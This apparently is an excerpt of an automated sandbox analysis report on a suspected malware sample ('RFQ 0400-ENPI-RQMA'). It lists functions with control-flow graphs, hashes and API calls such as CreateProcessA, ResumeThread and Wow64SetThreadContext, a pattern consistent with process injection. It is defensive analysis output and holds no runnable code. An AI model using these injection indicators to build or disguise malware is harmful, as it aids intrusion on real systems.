                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q$Te^q$)"
                                                                                      • API String ID: 0-4031938444
                                                                                      • Opcode ID: 91df6c1801205c58adeea326c9dacba89f8d95ab81dc3619d370e63adc07f690
                                                                                      • Instruction ID: aa421d8ed47e1ddf7e12660b2a265ae4385933907eb51f74b6f109ac39d53327
                                                                                      • Opcode Fuzzy Hash: 91df6c1801205c58adeea326c9dacba89f8d95ab81dc3619d370e63adc07f690
                                                                                      • Instruction Fuzzy Hash: 4181E774E012199FDB08CFAAC9846DEFBB2FF89310F24842AD419AB358D7355946CF54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B249C1 Relevance: 1.7, Strings: 1, Instructions: 415COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 842 7b249c1-7b24a0c 844 7b24a53-7b24a7c 842->844 845 7b24a0e-7b24a50 842->845 846 7b24aba-7b24ad5 844->846 847 7b24a7e-7b24a90 844->847 845->844 848 7b24ad7 846->848 849 7b24adc-7b24b1a call 7b250f1 846->849 850 7b24a92-7b24ab8 847->850 851 7b24ad6-7b24adb 847->851 848->849 854 7b24b20 849->854 850->846 851->849 855 7b24b27-7b24b43 854->855 856 7b24b45 855->856 857 7b24b4c-7b24b4d 855->857 856->854 856->857 858 7b24e74-7b24e8b 856->858 859 7b24c7a-7b24c86 856->859 860 7b24d78-7b24d8c 856->860 861 7b24b6b-7b24b6f 856->861 862 7b24c29-7b24c35 856->862 863 7b24d2e-7b24d32 856->863 864 7b24cae-7b24cc0 856->864 865 7b24def-7b24e0f 856->865 866 7b24cef-7b24d0f 856->866 867 7b24eac-7b24eb0 856->867 868 7b24b52-7b24b69 856->868 869 7b24e90-7b24ea7 856->869 870 7b24d91-7b24d9d 856->870 871 7b24d14-7b24d29 856->871 872 7b24e14-7b24e20 856->872 873 7b24b98-7b24ba4 856->873 874 7b24d5e-7b24d73 856->874 875 7b24edc-7b24eef 856->875 876 7b24e5d-7b24e6f 856->876 877 7b24c04-7b24c24 856->877 878 7b24dc5-7b24dd1 856->878 879 7b24cc5-7b24cd1 856->879 880 7b24e4b-7b24e58 856->880 881 7b24bcf-7b24bd8 856->881 857->875 858->855 902 7b24c88 859->902 903 7b24c8d-7b24ca9 859->903 860->855 882 7b24b82-7b24b89 861->882 883 7b24b71-7b24b80 861->883 896 7b24c37 862->896 897 7b24c3c-7b24c52 862->897 894 7b24d34-7b24d43 863->894 895 7b24d45-7b24d4c 863->895 864->855 865->855 866->855 892 7b24eb2-7b24ec1 867->892 893 7b24ec3-7b24eca 867->893 868->855 869->855 898 7b24da4 870->898 899 7b24d9f 870->899 871->855 884 7b24e22 872->884 885 7b24e27-7b24e46 872->885 888 7b24ba6 873->888 889 7b24bab-7b24bca 873->889 874->855 876->855 877->855 900 7b24dd3 878->900 901 7b24dd8-7b24dea 878->901 886 7b24cd3 879->886 887 7b24cd8-7b24cea 879->887 880->855 890 7b24bda-7b24be9 881->890 891 7b24beb-7b24bf2 881->891 905 7b24b90-7b24b96 882->905 883->905 884->885 885->855 886->887 887->855 888->889 889->855 906 7b24bf9-7b24bff 890->906 891->906 907 7b24ed1-7b24ed7 892->907 893->907 911 7b24d53-7b24d59 894->911 895->911 896->897 919 7b24c54 897->919 920 7b24c59-7b24c75 897->920 918 7b24dae-7b24dc0 898->918 899->898 900->901 901->855 902->903 903->855 905->855 906->855 907->855 911->855 918->855 919->920 920->855
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tIh
                                                                                      • API String ID: 0-443931868
                                                                                      • Opcode ID: 9881b9f0ebf4f2902262d60e0107e555f19eb79a3e576dcf833ab89fefdd9dde
                                                                                      • Instruction ID: fd787d486d429e3eb72982240fdfcb4a3ea4ad6a6dcb039f3fcdb539715e8032
                                                                                      • Opcode Fuzzy Hash: 9881b9f0ebf4f2902262d60e0107e555f19eb79a3e576dcf833ab89fefdd9dde
                                                                                      • Instruction Fuzzy Hash: CCF1BDB0D1529AEFDB04CFA9D4848EEFBB2FF49304B10A09AD015AB615C7359983CF95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B24AB0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tIh
                                                                                      • API String ID: 0-443931868
                                                                                      • Opcode ID: b827f16eb439fed3f6ea4ca4bf117de82cc6c8178b580ffe8d1b79eb5ae5bb42
                                                                                      • Instruction ID: 3981a3a4244618f66af0b25c3a52e564547043700290f5492cfcb6362029219f
                                                                                      • Opcode Fuzzy Hash: b827f16eb439fed3f6ea4ca4bf117de82cc6c8178b580ffe8d1b79eb5ae5bb42
                                                                                      • Instruction Fuzzy Hash: EFD169B0E1125ADFDB04CF99D4848AEFBB2FF89301B10D595E419AB614D734AA83CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D89100 Relevance: .4, Instructions: 401COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ef4494be4f8fb130d99b156d2c39bbda818e8a5ae0f5d0a1d0ae9d9c853b16d
                                                                                      • Instruction ID: 16941e082cbf2f374dd71324eb5ce6a776f016dfb662138457131d1894af67a2
                                                                                      • Opcode Fuzzy Hash: 2ef4494be4f8fb130d99b156d2c39bbda818e8a5ae0f5d0a1d0ae9d9c853b16d
                                                                                      • Instruction Fuzzy Hash: ACE1BEB17016058FDB65EBA5C860BBEB7F7EF88700F54446EE1869B290CB35E901CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B27F61 Relevance: .2, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff72df61f7214c7bdd82aeecdd8f3950481a803c215d2a0776650928bf711f49
                                                                                      • Instruction ID: ca393a8af53ebd2df7af14b892e7afb4fcfad381b2bd81b01636d32fbb8abd07
                                                                                      • Opcode Fuzzy Hash: ff72df61f7214c7bdd82aeecdd8f3950481a803c215d2a0776650928bf711f49
                                                                                      • Instruction Fuzzy Hash: 0691FAB0D16219EFDB08CFA5D58099EFBF2FB89300F20A456E419BB228D7749946DF14
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B27C48 Relevance: .2, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8a506d4c66663dd08ccf9a17caa7cc9e1fdb6f8ada507386f394763c389227f5
                                                                                      • Instruction ID: 00d477254dd2d446c447e1c03e22a3ec8c79d7baf59b74379f8f10ce4ac41719
                                                                                      • Opcode Fuzzy Hash: 8a506d4c66663dd08ccf9a17caa7cc9e1fdb6f8ada507386f394763c389227f5
                                                                                      • Instruction Fuzzy Hash: CA8125B4E15229DFDB04CFA9C9409EEFBB2FF89210F10959AD905B7224D7349A42CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D80007 Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 26e88fabeff41b2a73fe8ddb28f73c9e733bbc8929d568a2bb2b007ab05ae936
                                                                                      • Instruction ID: 36600e355e1b767e9031fcb49b91521a9c55a9903e02435018db8a7412149680
                                                                                      • Opcode Fuzzy Hash: 26e88fabeff41b2a73fe8ddb28f73c9e733bbc8929d568a2bb2b007ab05ae936
                                                                                      • Instruction Fuzzy Hash: 4E312DB0D057449FDB59CFA6C8443DABFF2AF86310F14C0AAD444AB265DB750949CF51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B23C01 Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 38cbab2bde9a59b12eecd536c5fe670c655ff9fd46cdde375cb0fbbb1e1f4906
                                                                                      • Instruction ID: b871128888032f9a265500262b6853bdef2205b3f9f8be9ee652b6f9371c1b8a
                                                                                      • Opcode Fuzzy Hash: 38cbab2bde9a59b12eecd536c5fe670c655ff9fd46cdde375cb0fbbb1e1f4906
                                                                                      • Instruction Fuzzy Hash: 2521E9B1E016589BEB18CF9BD9446DEFBF3AFC9310F14C16AD409A6268DB740A46CA50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B204E0 Relevance: 16.5, Strings: 13, Instructions: 281COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 294 7b204e0 295 7b204e5-7b204e8 294->295 296 7b204fa-7b204fe 295->296 297 7b204ea 295->297 309 7b20500-7b20509 296->309 310 7b20521 296->310 297->296 298 7b20763-7b2076b 297->298 299 7b205b3-7b205bd 297->299 300 7b20770-7b20783 297->300 301 7b20891-7b2089a 297->301 302 7b206c7-7b206da 297->302 303 7b207b4-7b207f0 297->303 304 7b205d4-7b205d8 297->304 305 7b207aa-7b207af 297->305 306 7b2087a-7b2088e 297->306 307 7b20678-7b2067c 297->307 308 7b2082c-7b20856 297->308 298->295 311 7b205c3-7b205cf 299->311 312 7b2089d-7b208b7 299->312 334 7b207a3-7b207a8 300->334 335 7b20785-7b2078c 300->335 302->312 338 7b206e0-7b206e8 302->338 377 7b207f2-7b207f8 303->377 378 7b20808-7b20815 303->378 313 7b205da-7b205e3 304->313 314 7b205fb 304->314 305->295 318 7b2067e-7b20687 307->318 319 7b2069f 307->319 384 7b20862-7b2086c 308->384 385 7b20858 308->385 315 7b20510-7b2051d 309->315 316 7b2050b-7b2050e 309->316 317 7b20524-7b20526 310->317 311->295 323 7b205e5-7b205e8 313->323 324 7b205ea-7b205f7 313->324 327 7b205fe-7b20602 314->327 326 7b2051f 315->326 316->326 329 7b20528-7b2052e 317->329 330 7b2053e-7b2055b 317->330 332 7b20689-7b2068c 318->332 333 7b2068e-7b2069b 318->333 320 7b206a2-7b206c2 319->320 320->295 336 7b205f9 323->336 324->336 326->317 340 7b20604-7b20616 327->340 341 7b20618 327->341 343 7b20532-7b2053c 329->343 344 7b20530 329->344 363 7b2057e 330->363 364 7b2055d-7b20566 330->364 345 7b2069d 332->345 333->345 348 7b2079e 334->348 335->312 347 7b20792-7b20799 335->347 336->327 350 7b206ea-7b206f3 338->350 351 7b2070b 338->351 352 7b2061b-7b2061f 340->352 341->352 343->330 344->330 345->320 347->348 348->295 357 7b206f5-7b206f8 350->357 358 7b206fa-7b20707 350->358 359 7b2070e-7b20710 351->359 360 7b20640 352->360 361 7b20621-7b2062a 352->361 365 7b20709 357->365 358->365 367 7b20712-7b20718 359->367 368 7b2072e 359->368 371 7b20643-7b20664 360->371 369 7b20631-7b20634 361->369 370 7b2062c-7b2062f 361->370 374 7b20581-7b205aa call 7b21650 363->374 372 7b20568-7b2056b 364->372 373 7b2056d-7b2057a 364->373 365->359 379 7b2071a-7b2071c 367->379 380 7b2071e-7b2072a 367->380 382 7b20730-7b20732 368->382 381 7b2063e 369->381 370->381 371->312 398 7b2066a-7b20673 371->398 383 7b2057c 372->383 373->383 402 7b205b0 374->402 387 7b207fa 377->387 388 7b207fc-7b207fe 377->388 378->312 390 7b2081b-7b20827 378->390 389 7b2072c 379->389 380->389 381->371 392 7b20734-7b2073a 382->392 393 7b2074c-7b2075e 382->393 383->374 384->312 386 7b2086e-7b20878 384->386 396 7b2085d 385->396 386->396 387->378 388->378 389->382 390->295 399 7b2073e-7b2074a 392->399 400 7b2073c 392->400 393->295 396->295 398->295 399->393 400->393 402->299
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$ fcq$ fcq$Te^q$Te^q$XX^q$XX^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-1437089595
                                                                                      • Opcode ID: e55ee0281744675829652a341a0c306488b834fee8483b3d9fb6efacf26363e9
                                                                                      • Instruction ID: c248dba911549231acdd62f8e35c1285a55f0b7033586e506bd477115227cf1e
                                                                                      • Opcode Fuzzy Hash: e55ee0281744675829652a341a0c306488b834fee8483b3d9fb6efacf26363e9
                                                                                      • Instruction Fuzzy Hash: ACB180B0F1522DDFEB18AF94C5486ADB7B2FB85700F158495D40AAF294CB309C87DB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 016AD149 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 405 16ad149-16ad155 406 16ad158-16ad15c 405->406 407 16ad15d-16ad1e7 GetCurrentProcess 405->407 406->407 411 16ad1e9-16ad1ef 407->411 412 16ad1f0-16ad224 GetCurrentThread 407->412 411->412 413 16ad22d-16ad261 GetCurrentProcess 412->413 414 16ad226-16ad22c 412->414 416 16ad26a-16ad285 call 16ad327 413->416 417 16ad263-16ad269 413->417 414->413 420 16ad28b-16ad2ba GetCurrentThreadId 416->420 417->416 421 16ad2bc-16ad2c2 420->421 422 16ad2c3-16ad325 420->422 421->422
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 016AD1D6
                                                                                      • GetCurrentThread.KERNEL32 ref: 016AD213
                                                                                      • GetCurrentProcess.KERNEL32 ref: 016AD250
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 016AD2A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: 933a3d7662ca6dd432f41bdaa3192838f4eb7e1fafc7fdcb3295c65444086475
                                                                                      • Instruction ID: ad808efd5cabc782385dbb8e5a27d319e41599a864a3e3033cc0b798cad63915
                                                                                      • Opcode Fuzzy Hash: 933a3d7662ca6dd432f41bdaa3192838f4eb7e1fafc7fdcb3295c65444086475
                                                                                      • Instruction Fuzzy Hash: 605165B09002098FDB14DFA9D948B9EBBF1FF88314F20C45AE519A7360DB34A984CF65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 016AD158 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 429 16ad158-16ad1e7 GetCurrentProcess 434 16ad1e9-16ad1ef 429->434 435 16ad1f0-16ad224 GetCurrentThread 429->435 434->435 436 16ad22d-16ad261 GetCurrentProcess 435->436 437 16ad226-16ad22c 435->437 439 16ad26a-16ad285 call 16ad327 436->439 440 16ad263-16ad269 436->440 437->436 443 16ad28b-16ad2ba GetCurrentThreadId 439->443 440->439 444 16ad2bc-16ad2c2 443->444 445 16ad2c3-16ad325 443->445 444->445
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 016AD1D6
                                                                                      • GetCurrentThread.KERNEL32 ref: 016AD213
                                                                                      • GetCurrentProcess.KERNEL32 ref: 016AD250
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 016AD2A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1657346205.00000000016A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_16a0000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: 6ea15156238faaf2753336da246b35ad2a13dc024f38675b0c64c5f0a73a3806
                                                                                      • Instruction ID: e5a1d643249755917a47d783b7272d603f5aeb7a37f6f8be975ff46ec0a08c9e
                                                                                      • Opcode Fuzzy Hash: 6ea15156238faaf2753336da246b35ad2a13dc024f38675b0c64c5f0a73a3806
                                                                                      • Instruction Fuzzy Hash: 405135B09002098FDB14DFA9D948B9EBBF1FF88314F24C45AE519A7360DB34A984CF65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D8591B Relevance: 3.1, APIs: 2, Instructions: 120threadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 596 7d8591b-7d8591c 597 7d8595c-7d8595e 596->597 598 7d8591e-7d85959 596->598 599 7d859ca-7d85a1b 597->599 600 7d85960-7d8598f ResumeThread 597->600 598->597 603 7d85a2b-7d85a5b Wow64SetThreadContext 599->603 604 7d85a1d-7d85a29 599->604 605 7d85998-7d859bd 600->605 606 7d85991-7d85997 600->606 608 7d85a5d-7d85a63 603->608 609 7d85a64-7d85a94 603->609 604->603 606->605 608->609
                                                                                      APIs
                                                                                      • ResumeThread.KERNELBASE(?), ref: 07D85982
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: ResumeThread
                                                                                      • String ID:
                                                                                      • API String ID: 947044025-0
                                                                                      • Opcode ID: 03298a3a375293bfd97af120d8ae5db4f663d2f24ff27267d98a7dd9c5eab370
                                                                                      • Instruction ID: e7a48534c49be15ec28235a9a8e58fe647a5a0310b60be017c1831c18705fe4f
                                                                                      • Opcode Fuzzy Hash: 03298a3a375293bfd97af120d8ae5db4f663d2f24ff27267d98a7dd9c5eab370
                                                                                      • Instruction Fuzzy Hash: 8A4139B19002498FDB10DFAAD5857EEFBF4AF88324F148429D45AA7240C779A545CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B2F120 Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 616 7b2f120-7b2f143 617 7b2f145 616->617 618 7b2f14a-7b2f297 call 7b2f0f0 616->618 617->618 629 7b2f215-7b2f21b 618->629 630 7b2f18a-7b2f18f 618->630 629->630 631 7b2f325-7b2f33c 630->631 632 7b2f195-7b2f196 630->632 639 7b2f1d4-7b2f1d8 631->639 632->631 640 7b2f1da-7b2f312 639->640 641 7b2f228-7b2f29d 639->641 652 7b2f314 call 7d80419 640->652 653 7b2f314 call 7d80040 640->653 654 7b2f314 call 7d80007 640->654 641->639 651 7b2f31a-7b2f324 652->651 653->651 654->651
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Te^q$Te^q
                                                                                      • API String ID: 0-3743469327
                                                                                      • Opcode ID: f2e4a409f61f8265b03b6a43ccbedddc2e93ac94868a6b15f8bf7c77ad72299e
                                                                                      • Instruction ID: f2b00e92de75401ab199dadd678402ea1c69b1ea5a67b67e6245215a673e3c76
                                                                                      • Opcode Fuzzy Hash: f2e4a409f61f8265b03b6a43ccbedddc2e93ac94868a6b15f8bf7c77ad72299e
                                                                                      • Instruction Fuzzy Hash: EE61E4B4E15219DFDB08CFA9C984AEDBBB6BF89301F10916AE819AB354D7305906CF50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07B250F1 Relevance: 2.6, Strings: 2, Instructions: 62COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 655 7b250f1-7b2510e 656 7b25110 655->656 657 7b25115-7b2511d call 7b251e8 655->657 656->657 658 7b25123 657->658 659 7b2512a-7b25146 658->659 660 7b25148 659->660 661 7b2514f-7b25150 659->661 660->658 660->661 662 7b25152-7b25166 660->662 663 7b25196-7b251b8 660->663 664 7b251bd-7b251c1 660->664 661->664 666 7b25168-7b25177 662->666 667 7b25179-7b25180 662->667 663->659 668 7b25187-7b25194 666->668 667->668 668->659
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1663627710.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7b20000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3H5$3H5
                                                                                      • API String ID: 0-2752242361
                                                                                      • Opcode ID: 373edc13f2c98ff3ed255f54a3a85ecba49c663dfd705ed8b438bc617fdc4e67
                                                                                      • Instruction ID: 225e943994edc85db19a68e55670304f731df727fd4fb9ea01239f54d161c614
                                                                                      • Opcode Fuzzy Hash: 373edc13f2c98ff3ed255f54a3a85ecba49c663dfd705ed8b438bc617fdc4e67
                                                                                      • Instruction Fuzzy Hash: 942136B0E11219EFDB54CFA9C540AAEFBF1FF89301F10D5AAC508A7214E7309A56DB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D85DE5 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 670 7d85de5-7d85e85 672 7d85ebe-7d85ede 670->672 673 7d85e87-7d85e91 670->673 680 7d85ee0-7d85eea 672->680 681 7d85f17-7d85f46 672->681 673->672 674 7d85e93-7d85e95 673->674 676 7d85eb8-7d85ebb 674->676 677 7d85e97-7d85ea1 674->677 676->672 678 7d85ea3 677->678 679 7d85ea5-7d85eb4 677->679 678->679 679->679 682 7d85eb6 679->682 680->681 683 7d85eec-7d85eee 680->683 687 7d85f48-7d85f52 681->687 688 7d85f7f-7d86039 CreateProcessA 681->688 682->676 685 7d85ef0-7d85efa 683->685 686 7d85f11-7d85f14 683->686 689 7d85efc 685->689 690 7d85efe-7d85f0d 685->690 686->681 687->688 691 7d85f54-7d85f56 687->691 701 7d8603b-7d86041 688->701 702 7d86042-7d860c8 688->702 689->690 690->690 692 7d85f0f 690->692 693 7d85f58-7d85f62 691->693 694 7d85f79-7d85f7c 691->694 692->686 696 7d85f64 693->696 697 7d85f66-7d85f75 693->697 694->688 696->697 697->697 698 7d85f77 697->698 698->694 701->702 712 7d860d8-7d860dc 702->712 713 7d860ca-7d860ce 702->713 715 7d860ec-7d860f0 712->715 716 7d860de-7d860e2 712->716 713->712 714 7d860d0 713->714 714->712 718 7d86100-7d86104 715->718 719 7d860f2-7d860f6 715->719 716->715 717 7d860e4 716->717 717->715 721 7d86116-7d8611d 718->721 722 7d86106-7d8610c 718->722 719->718 720 7d860f8 719->720 720->718 723 7d8611f-7d8612e 721->723 724 7d86134 721->724 722->721 723->724 726 7d86135 724->726 726->726
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D86026
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664257787.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7d80000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess
                                                                                      • String ID:
                                                                                      • API String ID: 963392458-0
                                                                                      • Opcode ID: f80105cbbfdccb93e5d926b37f0934d78383846b66918e75b2f68fe8f1b656b4
                                                                                      • Instruction ID: f99b098cb3a0e0af3609e812be79a4b9eb8a507d0443995b9c7094c570012450
                                                                                      • Opcode Fuzzy Hash: f80105cbbfdccb93e5d926b37f0934d78383846b66918e75b2f68fe8f1b656b4
                                                                                      • Instruction Fuzzy Hash: 81A16BB1D0021ADFDB60DF68C840BEDFBB2BF44314F1481AAE849A7250DB759985CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 07D85DF0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 727 7d85df0-7d85e85 729 7d85ebe-7d85ede 727->729 730 7d85e87-7d85e91 727->730 737 7d85ee0-7d85eea 729->737 738 7d85f17-7d85f46 729->738 730->729 731 7d85e93-7d85e95 730->731 733 7d85eb8-7d85ebb 731->733 734 7d85e97-7d85ea1 731->734 733->729 735 7d85ea3 734->735 736 7d85ea5-7d85eb4 734->736 735->736 736->736 739 7d85eb6 736->739 737->738 740 7d85eec-7d85eee 737->740 744 7d85f48-7d85f52 738->744 745 7d85f7f-7d86039 CreateProcessA 738->745 739->733 742 7d85ef0-7d85efa 740->742 743 7d85f11-7d85f14 740->743 746 7d85efc 742->746 747 7d85efe-7d85f0d 742->747 743->738 744->745 748 7d85f54-7d85f56 744->748 758 7d8603b-7d86041 745->758 759 7d86042-7d860c8 745->759 746->747 747->747 749 7d85f0f 747->749 750 7d85f58-7d85f62 748->750 751 7d85f79-7d85f7c 748->751 749->743 753 7d85f64 750->753 754 7d85f66-7d85f75 750->754 751->745 753->754 754->754 755 7d85f77 754->755 755->751 758->759 769 7d860d8-7d860dc 759->769 770 7d860ca-7d860ce 759->770 772 7d860ec-7d860f0 769->772 773 7d860de-7d860e2 769->773 770->769 771 7d860d0 770->771 771->769 775 7d86100-7d86104 772->775 776 7d860f2-7d860f6 772->776 773->772 774 7d860e4 773->774 774->772 778 7d86116-7d8611d 775->778 779 7d86106-7d8610c 775->779 776->775 777 7d860f8 776->777 777->775 780 7d8611f-7d8612e 778->780 781 7d86134 778->781 779->778 780->781 783 7d86135 781->783 783->783
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07D86026
                                                                                      Memory Dump Source
